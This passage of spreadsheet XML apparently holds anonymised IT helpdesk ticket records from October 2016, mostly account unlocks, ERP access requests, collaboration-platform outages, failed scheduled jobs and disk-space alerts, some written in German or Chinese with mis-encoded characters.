    <s v="_x000a__x000a_received from: vqefplhm.mfpjaleo@gmail.com_x000a__x000a_hello,_x000a__x000a_my user id: yandfgs145. please help to unlock it._x000a__x000a_"/>
    <s v="vqefplhm mfpjaleo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error erp /SID_34/sa38 /zsd_mexico_inwarehouse_tool_extract"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zvjwleuo.tdfqgcal@gmail.com_x000d__x000a__x000d__x000a_i cannot run the erp /SID_34/sa38 /zsd_mexico_inwarehouse_tool_extract, shows an error:_x000d__x000a_[cid:image001.png@01d22a3d.f7f2ecb0]_x000d__x000a_[cid:image002.png@01d22a3d.f7f2ecb0]_x000d__x000a_best "/>
    <s v="zvjwleuo tdfqgcal"/>
    <x v="19"/>
  </r>
  <r>
    <s v="collaboration_platform access issue "/>
    <s v="first name: trtgoywdd_x000a__x000a_last name: povirttch_x000a__x000a_customer job title: sales engineer_x000a__x000a_contact #: _x000a__x000a_email address: cmifnspg.icauzxfh@gmail.com_x000a__x000a_vitalyst reference number: 0bb7f42a37_x000a__x000a_was bomsdgar used? yes_x000a__x000a_description of problem: unable to access collaboration_platform site_x000a__x000a__x000a__x000a_if this problem persists, contact your support team and include these technical details: _x000a_correlation id: SID_215af9d-3033-3000-ace7-0cf21c145e14 _x000a_date and time: 10/19/2016 4:04:23 pm _x000a_user: cmifnspg.icauzxfh@gmail.com _x000a_issue type: user does not have permissions. _x000a__x000a_steps taken so far:_x000a__x000a_goes to the hub &gt; search &gt; lagp &gt; lagp request &gt; goes to form&gt; click on blue circle&gt; access denied message_x000a__x000a_previously had access to this site. _x000a__x000a_"/>
    <s v="cmifnspg icauzxfh"/>
    <x v="15"/>
  </r>
  <r>
    <s v="access to SID_1"/>
    <s v="i need access to SID_1 uacyltoe hxgaycze system:  _x000a__x000a_username:  owenssdcl12_x000a__x000a_supervisor:  phjencfg kwtcyazx_x000a__x000a_manager:  vnhaycfo smkpfjzv_x000a__x000a_wsjkbw owwddwens_x000a_accounting specialist_x000a__x000a__x000a_"/>
    <s v="varldgiw hfyogqnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no authorization in apps"/>
    <s v="no authorization in apps"/>
    <s v="vcnjqfta islabdft"/>
    <x v="25"/>
  </r>
  <r>
    <s v="unable to log in to erp SID_34"/>
    <s v="unable to log in to erp SID_34"/>
    <s v="quxtnlgd tqnjyzsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1315 failed in job_scheduler at: 10/19/2016 18:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1315 failed in job_scheduler at: 10/19/2016 18:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="access to erp SID_1 for user rgpvdhcm mgvpabsj"/>
    <s v="access to erp SID_1 for user rgpvdhcm mgvpabsj"/>
    <s v="rgpvdhcm mgvpabsj"/>
    <x v="19"/>
  </r>
  <r>
    <s v="folder access requested for HostName_768"/>
    <s v="zugriff auf verzeichnis angefragt._x000d__x000a_folder access requested. HostName_768_x000d__x000a__x000d__x000a_benutzer id ?_x000d__x000a_user id ?_x000d__x000a__x000d__x000a_benutzer die position titel?_x000d__x000a_user's position title ?_x000d__x000a__x000d__x000a_verzeichnis? _x000d__x000a_folder t:\corpbusinessdev\monthly financial review\fy17\2016-9&gt; (october 14, 2016) _x000d__x000a__x000d__x000a_art des zugriffs?_x000d__x000a_type of access ? (read only or full control) ?"/>
    <s v="qkmgtnla buraxcij"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder access request "/>
    <s v="_x000a_summary:need access to the following folder for our financial review t:\corpbusinessdev\monthly financial review\_x000a__x000a_i need to get read write.  i need to save files here &amp; be able to open them"/>
    <s v="vsbtygin oufhtbas"/>
    <x v="33"/>
  </r>
  <r>
    <s v="unlocked account"/>
    <s v="unlocked account"/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pricing and availability look up in dynamics crm not working "/>
    <s v="the attached screenshot is from ptljghyk qhtvlrxe.  she looked up a product that she knows we have.  the screen shows 0."/>
    <s v="qmglkaru qiwhfkdv"/>
    <x v="39"/>
  </r>
  <r>
    <s v="engineering_tool : not able to update new customer "/>
    <s v="engineering_tool : not able to update new customer "/>
    <s v="crjhotyk pxslorbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access collaboration_platform"/>
    <s v="unable to access collaboration_platform"/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open engineering_tool "/>
    <s v="unable to open engineering_tool "/>
    <s v="crjhotyk pxslorbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="permission to create cost centers in SID_1 erp (transaction ks01)"/>
    <s v="i no longer have access to create cost centers in SID_1/only SID_34.  please update access for cost center creation in the uacyltoe hxgayczeing system (SID_1).  transaction ks01.  _x000d__x000a__x000d__x000a_"/>
    <s v="zujpycos pogmachd"/>
    <x v="19"/>
  </r>
  <r>
    <s v="collaboration_platform issue "/>
    <s v="_x000a_summary:having issues with collaboration_platform... unable to access_x000a_we have meetings that people have to post documents to the library and are not able to access...when will it be fixed??"/>
    <s v="lpoebzsc grknswyo"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" static ip address "/>
    <s v="it has been requested by our temporary service to provide them with a static ip address for a time clock that will be hard wired in. can you provide_x000a__x000a_contact # : _x000a__x000a_summary: do i gear the request for a static ip address to this box for assistance"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="3"/>
  </r>
  <r>
    <s v="collaboration_platform system not working"/>
    <s v="the collaboration_platform system is not working. multiple users report getting an error trying to open any company.collaboration_platform.com website. this greatly affects the discount process as we cannot access any request or update approved ones. the error message which pops up is attached. this affects poznaÅ„ and usa."/>
    <s v="wgqkKupL esgahtqn"/>
    <x v="15"/>
  </r>
  <r>
    <s v="cannot get my usb wifi adapter to work on my laptop."/>
    <s v="cannot get my usb wifi adapter to work on my laptop."/>
    <s v="gqkedvzu czoniyra"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to access collaboration_platform"/>
    <s v="unable to access collaboration_platform"/>
    <s v="qzioyhud csehbrfy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform issue "/>
    <s v="_x000a_summary:i was thrown off of vpn and tried several times to get back in. i am now back into vpn but cannot sign on to crm"/>
    <s v="nibaotpy vmxathog"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform issue "/>
    <s v="collaboration_platform issue"/>
    <s v="mknoeicg aziptqvu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform down "/>
    <s v="collaboration_platform down "/>
    <s v="wsomjhce afjkuwih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype for business is not connected to the exchange."/>
    <s v="ihuogcqd ihusvgcw phone.   my skype for business can't connect to exchange. this has been going on all week. i have rebooted and logged back into skype but it will not connect and i keep getting this error.   "/>
    <s v="ihuogcqd ihusvgcw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the company collaboration_platform is reporting a  down status since 10/19/2016 2:33 pm"/>
    <s v="the company collaboration_platform is reporting a  down status since 10/19/2016 2:33 pm"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="15"/>
  </r>
  <r>
    <s v="vip 1: collaboration_platform page access issue"/>
    <s v="vip 1: collaboration_platform page access issue"/>
    <s v="lqdpfamz mqitfrcv"/>
    <x v="15"/>
  </r>
  <r>
    <s v="when running sa38 report zsdr0100, open order report, the report is not pulling usa scheduling agreements"/>
    <s v="when running the report, example would be mm # 2123340 for location plant_92 as the source location, and making sure on the outputs tab, that scheduling agreements are included.  this report is not picking up this scheduling agreement 4111333643/000010/0049????"/>
    <s v="prgewfly ndtfvple"/>
    <x v="12"/>
  </r>
  <r>
    <s v="no boot : service tag : 5lkzddens1"/>
    <s v="windows running into problem : goes to start up repair page._x000a_loading fine in safe mode with networking._x000a_user was able to log in using admin account.but dint dint have access to it._x000a_tried shutting down pc and trying booting up...no go_x000a_flea power ..no go.._x000a_it was going to repair screen again and again .._x000a__x000a__x000a_st : 5lkzddens1_x000a_contact details : _x000a_can be contacted during 7:00am-4:00pm"/>
    <s v="qdtywmkv aolijwnx"/>
    <x v="2"/>
  </r>
  <r>
    <s v="HostName_1003 : volume: c:\ label:sys-HostName_1003 543aa385 is over 85% space consumed. space available: 4.5 g."/>
    <s v="HostName_1003 : volume: c:\ label:sys-HostName_1003 543aa385 is over 85% space consumed. space available: 4.5 g._x000d__x000a_"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="i need my address added to xerox prtqx7300"/>
    <s v="i need my address added to xerox prtqx7300"/>
    <s v="lrhfoxen hlqsumgx"/>
    <x v="2"/>
  </r>
  <r>
    <s v="personal number :  locked : expense report "/>
    <s v="personal number :  locked : expense report "/>
    <s v="uyhceqzr tpbdwiyv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_37 password reset"/>
    <s v="erp SID_37 password reset"/>
    <s v="mpihysnw wrctgoan"/>
    <x v="0"/>
  </r>
  <r>
    <s v="it_ passwort"/>
    <s v="_x000a__x000a_received from: soldfnbq.uhnbsvqd@gmail.com_x000a__x000a_hallo,_x000a__x000a_ersuche alle meine passwÃ¶rter zurÃ¼ckzusetzen, da gesperrt. crm,erp,vpn_x000a__x000a_hello,_x000a__x000a_all my passwords are locked. crm, erp, vpn_x000a__x000a_mit freundlichen grÃ¼ÃŸen/ best "/>
    <s v="soldfnbq uhnbsvqd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype and outlook synch issue , meeting are not showing up in skype,"/>
    <s v="skype and outlook synch issue , meeting are not showing up in skype,_x000d__x000a_error message attached_x000d__x000a__x000d__x000a_error message : skype for business and exchange aren't making a connection"/>
    <s v="ncksqfmz fzcjunai"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook hang"/>
    <s v="unable to open the outlook its hang at process stage"/>
    <s v="oncidblt ucewizyd"/>
    <x v="18"/>
  </r>
  <r>
    <s v="this message was sent to the company quarantine database. please contact company it help desk for more information"/>
    <s v="from: ncasrpvx fijwprtv _x000a_sent: wednesday, october 19, 2016 6:24 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject:  tr: notification: re: po #no ds00784fd9b60_x000a__x000a__x000a_hello_x000a__x000a_could you check this message _x000a__x000a_"/>
    <s v="ncasrpvx fijwprtv"/>
    <x v="26"/>
  </r>
  <r>
    <s v="companyguest account for 2 days"/>
    <s v="mechmet hswddwk_x000a_company:sllwdw75_x000a_tel._x000a_email: m.hswddwk@wsjsoiwd8yw.de_x000a_period: from now til tomorrow at 6mp"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print. driver not found."/>
    <s v="unable to print. driver not found."/>
    <s v="khrflgcj zxojidhe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook"/>
    <s v="unable to open outlook"/>
    <s v="stvpxkbf gqchobaj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no access to ethics. see below failure message..."/>
    <s v="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s v="jkuaslxe hrodszpl"/>
    <x v="23"/>
  </r>
  <r>
    <s v="needs to change password "/>
    <s v="needs to change password "/>
    <s v="cukzsyjo lxspyctf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="fails to log in to erp and engineering tool"/>
    <s v="i changed my password using the password manager and now i am locked out of erp. i used the password manager to unlock but still fails to log in to erp and engineering tool"/>
    <s v="hftanwjr lhdqcwsr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1318 failed in job_scheduler at: 10/19/2016 10:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1318 failed in job_scheduler at: 10/19/2016 10:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to open netweaver "/>
    <s v="unable to open netweaver "/>
    <s v="ueqoimkc mhqyzklv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype is not functioning"/>
    <s v="trying to use skype, is not responding, was working earlier"/>
    <s v="mscgnafj bvftidka"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 1 :user unable to login to the pc."/>
    <s v="vip 1 :user unable to login to the pc._x000d__x000a_-advised the user to restart the pc and try to login with the new password.no go_x000d__x000a_-reset and help the user login to the pc.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jetgpdqn rpfqxzvb"/>
    <x v="27"/>
  </r>
  <r>
    <s v="employment status - new non-employee ycgkinov czoparqg @ us03 temp 10.20.16"/>
    <s v="*page down to ensure that all required data fields are complete before submitting*_x000a__x000a_use this template for consultants, temps, interns, vendors, etc.                   please complete all entries._x000a__x000a_**id 21111594_x000a_first name ?johddnthay_x000a_last name ?welwsswbtwe_x000a_location ?usa us03_x000a_manager / sponsor ?keddsdn wethrybb_x000a_cost center ?bdm025_x000a_external company name ?kellkwdy_x000a_what systems do they need access on ?mii_x000a_mii? yes_x000a_         if yes â€“ is user operator, admin or supervisor?operator need username and p/word_x000a_security note: for mii â€“ add im:shopfloor_user_* to user's SID_34 account_x000a_is company email required for this person ?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_x000a_requires access until (date) ?_x000a_is the computer owned by company ?_x000a_     if yes, is it a laptop or desktop ?                      computer name:_x000a_is remote access/vpn required ?_x000a_if yes, please provide to which all applications, erp systems, network servers the user needs access via vpn._x000a_start date ?10.20.16"/>
    <s v="lfikjasz tjbqcmvl"/>
    <x v="19"/>
  </r>
  <r>
    <s v="business_clientæ— æ³•ç™»å…¥"/>
    <s v="_x000a__x000a_received from: ktghvuwr.uwtakcmj@gmail.com_x000a__x000a_hello_x000a__x000a_å…³äºŽbusiness_clientæ— æ³•ç™»å…¥çš„é—®é¢˜è¯·å¸®å¿™è§£å†³ï¼Œå³æ‰“å¼€business_clientè½¯ä»¶ï¼ŒçŽ°åœ¨æ— æ³•ç™»å…¥:_x000a__x000a_1ï¼Žè¿žæŽ¥vpnåŽï¼Œä»Žè½¯ä»¶ç«¯ç™»å…¥ä¸è¡Œï¼Œæ˜¾ç¤ºå¦‚ä¸‹ï¼š_x000a__x000a_[cid:image001.jpg@01d22a56.4f7ef4c0]_x000a_2ï¼Žä»Žç½‘é¡µç‰ˆç™»å…¥ï¼Œæ˜¾ç¤ºå¦‚ä¸‹ï¼Œå‡ºæ— æ³•ç™»å…¥ï¼š_x000a__x000a_[cid:image002.jpg@01d22a56.4f7ef4c0]_x000a__x000a__x000a__x000a_ktghvuwr uwtakcmj_x000a_sr. application engineer_x000a_optimization team_x000a_ktghvuwr.uwtakcmj@gmail.com&lt;mailto:ktghvuwr.uwtakcmj@gmail.com&gt;"/>
    <s v="ktghvuwr uwtakcmj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company guest account set up "/>
    <s v="company guest account set up "/>
    <s v="vmqcyzda kgvrfwcj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="in our west coast email box, we can grab an email and color code it, but it is not undating "/>
    <s v="not updating so that the other 3 people working the email box can see who has each email, , so we are duplicating work"/>
    <s v="wlhxrogv yawtxuod"/>
    <x v="0"/>
  </r>
  <r>
    <s v="query regarding unread sync failure emails"/>
    <s v="query regarding unread sync failure emails"/>
    <s v="wstxjbpv tjlncygd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to mii system : yrhackgt sfhxckgq"/>
    <s v="unable to login to mii system : yrhackgt sfhxckgq_x000d__x000a__x000d__x000a_checked account and found that it was not locked out._x000d__x000a_suggested user to unlock account from password_management_tool and try logging in again some time._x000d__x000a__x000d__x000a_"/>
    <s v="djlpawmc nyzwqofu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch ethics. flash player issue."/>
    <s v="unable to launch ethics. flash player issue."/>
    <s v="ebikdrqw empubwxo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access e-time. "/>
    <s v="unable to access e-time. "/>
    <s v="ebikdrqw empubwxo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pls reset me the SID_39 crm production access"/>
    <s v="name:francestrhuco_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:uvdqkbgi.suabfdci@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:pls reset me the SID_39 crm production access_x000a_ thx"/>
    <s v="uvdqkbgi suabfdci"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot get thru to customer application support, something wrong with the phone #, you get a mesaage"/>
    <s v="their number is "/>
    <s v="wlhxrogv yawtxuod"/>
    <x v="6"/>
  </r>
  <r>
    <s v="microsoft outlook not responding, cannot open"/>
    <s v="krthdelly sthytachnik, phone , usa location, login "/>
    <s v="stvpxkbf gqchobaj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="called to unlock nvyjtmca xjhpznds account user id : datacntr"/>
    <s v="called to unlock nvyjtmca xjhpznds account user id : datacntr"/>
    <s v="shloyakw jztsxdln"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte scanner fÃ¼r we111 einstellen.drucker wurde auf werkseinstellung zurÃ¼ckgesetzt (konica )."/>
    <s v="bitte scanner fÃ¼r we111 einstellen.drucker wurde auf werkseinstellung zurÃ¼ckgesetzt (konica )."/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="help to change the windows password using password_management_tool password tool."/>
    <s v="help to change the windows password using password_management_tool password tool._x000a_-connected to the user system using teamviewer._x000a_-help the user login to the password_management_tool password tool and change the passwords._x000a_-help the user to sync the psswords to the company network._x000a_-caller confirmed that he was able to login._x000a_-issue resolved."/>
    <s v="crjhotyk pxslorbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bei herrn potthryzler (benutzerkennung: potsffwzlo) geht EU_tool am rechner: empw8111201a nicht."/>
    <s v="fehlermeldung: systemfehler &amp;h91115116 _x000a__x000a_with mr. potthryzler (user identification: potzlow) EU_tool does not go to the computer: empw8111201a._x000a_error message: system error &amp; h91115116 "/>
    <s v="txkgmwbc qohmgwrp"/>
    <x v="32"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="usalikfj lfmpxbcn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit login in br \usalikfj lfmpxbcn"/>
    <s v="probleme mit login in br \usalikfj lfmpxbcn"/>
    <s v="usalikfj lfmpxbcn"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp"/>
    <s v="_x000a__x000a_received from: tdkfuobm.qrtmaxos@gmail.com_x000a__x000a_good morning,_x000a__x000a_i am unable to log into my erp as normal.  after review with doyhtuug endlkglfeghart, it was determined this was from the switchover of servers._x000a__x000a_can you please correct so i can log in as normal?_x000a__x000a_"/>
    <s v="tdkfuobm qrtmaxos"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to SID_1"/>
    <s v="unable to login to SID_1"/>
    <s v="svhuewoy dluchbfg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="winwip not working , asking to buy trial version validity expired "/>
    <s v="winwip not working , asking to buy trial version validity expired "/>
    <s v="jhwgydeb ufiatosg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp ksff dashbankrds - need to push to computer lrrw7403548"/>
    <s v="_x000a__x000a_received from: dpuifqeo.eglwsfkn@gmail.com_x000a__x000a_please push the erp mii ksff dashbankrd to this computer_x000a__x000a_"/>
    <s v="dpuifqeo eglwsfkn"/>
    <x v="40"/>
  </r>
  <r>
    <s v="need access to erp SID_1 like rpgcdbfa reuwibpt"/>
    <s v="need access to erp SID_1 like rpgcdbfa reuwibpt"/>
    <s v="svhuewoy dluchbfg"/>
    <x v="19"/>
  </r>
  <r>
    <s v="user needs help to login to erp SID_34."/>
    <s v="user needs help to login to erp SID_34._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the userlogin to the erp SID_34._x000d__x000a_-issue resolved."/>
    <s v="sidyuncg ptvogsxa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need the configuration of new pc"/>
    <s v="need the configuration of new pc"/>
    <s v="xbjrphgk unbzmyhk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="it training - polycom "/>
    <s v="_x000d__x000a__x000d__x000a_received from: lkfzibrx.ljnabpgx@gmail.com_x000d__x000a__x000d__x000a_hellow_x000d__x000a__x000d__x000a_can someone help me to install polycom i have some issues_x000d__x000a__x000d__x000a_"/>
    <s v="lkfzibrx ljnabpgx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can you please give me access to the SID_1 uacyltoe hxgaycze system. user pildladjadga_x000a__x000a_"/>
    <s v="can you please give me access to the SID_1 uacyltoe hxgaycze system. user pildladjadga_x000a__x000a_"/>
    <s v="vtzhelgs ivewqogm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="acces to SID_1"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rgpvdhcm.mgvpabsj@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_due to travel_tool uacyltoe hxgayczeing please allow me to acces to q-11._x000d__x000a_"/>
    <s v="rgpvdhcm mgvpabsj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my collaboration_platform and sync keeps prompting for a password."/>
    <s v="i changed my password yesterday, ever since i keep getting messages to enter my email and password, i do and nothing happens, i again get prompted to enter it. my one note is not syncing because of this issue, evry time i work with a file i keep getting the prompt."/>
    <s v="geylvotd msadrzkj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="npc in erp system stuck due to employees leaving the company"/>
    <s v="npc 311190814 was created by svuxizgr mkynswqd before she left the company.  task list looked complete before she left, the materials are not fert.  i re-assigned coordinator and tasks to me but it wont complete."/>
    <s v="fgaulydz crswlkev"/>
    <x v="10"/>
  </r>
  <r>
    <s v="re: ticket_no1538187::cpp user ids - password change needed for 3 users - please assign to bokrgadgsu esdwduobrlcn"/>
    <s v="_x000a__x000a_received from: wibovsru.ulmqyhsk@gmail.com_x000a__x000a_hello drwfubia,_x000a__x000a_per our conversation, in two cases below i am unable to change the passwords because the erp system passwords are not reset to daypay3. i do not know who this ticket should be assigned to. i created the ticket and it was assigned by someone to you. if it has to go to someone else, please reassign it accordingly._x000a__x000a_cphemg02 - erp SID_34 - account locked - login not possible_x000a_cphemg02 - erp SID_39 - account locked - login not possible_x000a__x000a_"/>
    <s v="wibovsru ulmqyhsk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to \\eagcldaten\aese\leitung\csd_emealeitung"/>
    <s v="need access to \\eagcldaten\aese\leitung\csd_emealeitung"/>
    <s v="mdfugwzt wbcaqkgr"/>
    <x v="33"/>
  </r>
  <r>
    <s v="folder deletion from s: drive"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hjokrfpv.fhpaxsqc@gmail.com_x000d__x000a__x000d__x000a_hello all,_x000d__x000a__x000d__x000a_could you please help me retrieving the deleted folder from s drive._x000d__x000a_below was the link. now it's not here. folder name: vacation plan._x000d__x000a_vacation plan update (file://HostName_95/teams/globalengservices/12tcb_graphics/vacation%20plan/team%20vacation%20updates%202016.xlsx_x000d__x000a__x000d__x000a_please support_x000d__x000a__x000d__x000a_"/>
    <s v="hjokrfpv fhpaxsqc"/>
    <x v="11"/>
  </r>
  <r>
    <s v="not able to view drawings in business_client"/>
    <s v="not able to view drawings in business_client"/>
    <s v="tvirflky febluink"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_37filesys failed in job_scheduler at: 10/19/2016 06:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37filesys failed in job_scheduler at: 10/19/2016 06:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_736 failed in job_scheduler at: 10/19/2016 06:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_736 failed in job_scheduler at: 10/19/2016 06:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="impact award"/>
    <s v="_x000a__x000a_received from: lzvdyouh.imqgfadb@gmail.com_x000a__x000a_hallo,_x000a__x000a_ich kann mich nicht in das impact award programdntym  einloggen oder mein pass-wort zurÃ¼cksetzen._x000a__x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_lzvdyouh imqgfadb_x000a_"/>
    <s v="lzvdyouh imqgfadb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue : reset password for SID_37 for pandethrypv"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):_x000a__x000a_enter user id of user having the issue:_x000a__x000a_transaction code(s) the user needs or was working with:_x000a__x000a_describe the issue:_x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user: pandethrypv"/>
    <s v="nrugzxkl lohqkvry"/>
    <x v="19"/>
  </r>
  <r>
    <s v="folder access : s:\globalace_holemaking\ha646"/>
    <s v="please see below in red:_x000d__x000a__x000d__x000a_viele grÃ¼ÃŸe / best "/>
    <s v="cltszugw tgzbklec"/>
    <x v="33"/>
  </r>
  <r>
    <s v="outlook not working"/>
    <s v="outlook not working"/>
    <s v="dwxlipbo vxmgbefs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to access walkme plugin"/>
    <s v="_x000a_every time i click on the &quot;walkme&quot; link , i get the &quot; upgrade plugin&quot; message ._x000a__x000a_i get the below message in a new tab. i am not being able to access &quot;walkme plugin&quot; on hr_tool._x000a__x000a__x000a__x000a_ _x000a_"/>
    <s v="lqvdoijm yntmlehu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="german caller "/>
    <s v="german caller "/>
    <s v="pwkrlqbc zslqfmka"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to get old mails in outlook"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kirtyywpuo.dcksxjeq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please note i am unable to get my old mails in the inbox. the oldest mail i can get is of 9th april 2015._x000d__x000a_i need my old mails also as there is important data related to customers._x000d__x000a__x000d__x000a_"/>
    <s v="kilywpuo dcksxjeq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_37hoti failed in job_scheduler at: 10/19/2016 05:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hoti failed in job_scheduler at: 10/19/2016 05:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="not able to open the existing hana report"/>
    <s v="not able to open the existing hana report"/>
    <s v="rcbdyslq zuspjbtw"/>
    <x v="8"/>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urevbjcp krcaylpz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nmgesubf.wugbalmy@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_   office 365 (collaboration_platform) is not executing in my a/c,_x000d__x000a__x000d__x000a_pl. help,_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="nmgesubf wugbalmy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a termination for ckfobaxd wgnejyvt, 11173878, effective 09/16/2016 has been approved. "/>
    <s v="a termination for ckfobaxd wgnejyvt, 11173878, effective 09/16/2016 has been approved. _x000d__x000a__x000d__x000a_account is not yet disabled "/>
    <s v="uazkjifp dhtnevcq"/>
    <x v="19"/>
  </r>
  <r>
    <s v="waste email from workflow system"/>
    <s v="_x000d__x000a__x000d__x000a_received from: creojvdh.ciblyskg@gmail.com_x000d__x000a__x000d__x000a_hello  it helperï¼Œ_x000d__x000a_recently i always got some email from working flow system to remind me approve pr :01456949  and 01456987, but that pr already no in erp , can you help me check &quot;?_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="creojvdh ciblyskg"/>
    <x v="29"/>
  </r>
  <r>
    <s v="not able to take skype meetings via head phone"/>
    <s v="laptop model : dell precision m4800"/>
    <s v="aiprzulo lzvmgqwy"/>
    <x v="18"/>
  </r>
  <r>
    <s v="belgium callsariving at agnwfwieszka kubiadfffk."/>
    <s v="there are belgium costumers calling the polish phone number of agnwfwieszka._x000a_can we do something on it."/>
    <s v="kydirtgu idwzeojv"/>
    <x v="6"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/19/2016 04:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/19/2016 04:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_106:volume consumed 85% ,out of 20gb currently 3gb space  is available."/>
    <s v="HostName_106:volume consumed 85% ,out of 20gb currently 3gb space  is available."/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="power outage:company-na-mex-juarez-dmvpn-1811-rtr01 located at juarez mx is hard down since 2.53am et on 10/19."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______2.53am et on 10/19.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x v="7"/>
  </r>
  <r>
    <s v="lÃ¼fter defekt \industriekontrollmonitor \niptbwdq csenjruz"/>
    <s v="lÃ¼fter defekt \industriekontrollmonitor \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="reinstall win7 \qidgvtwa qvbutayx"/>
    <s v="reinstall win7 \qidgvtwa qvbutayx"/>
    <s v="qidgvtwa qvbutayx"/>
    <x v="24"/>
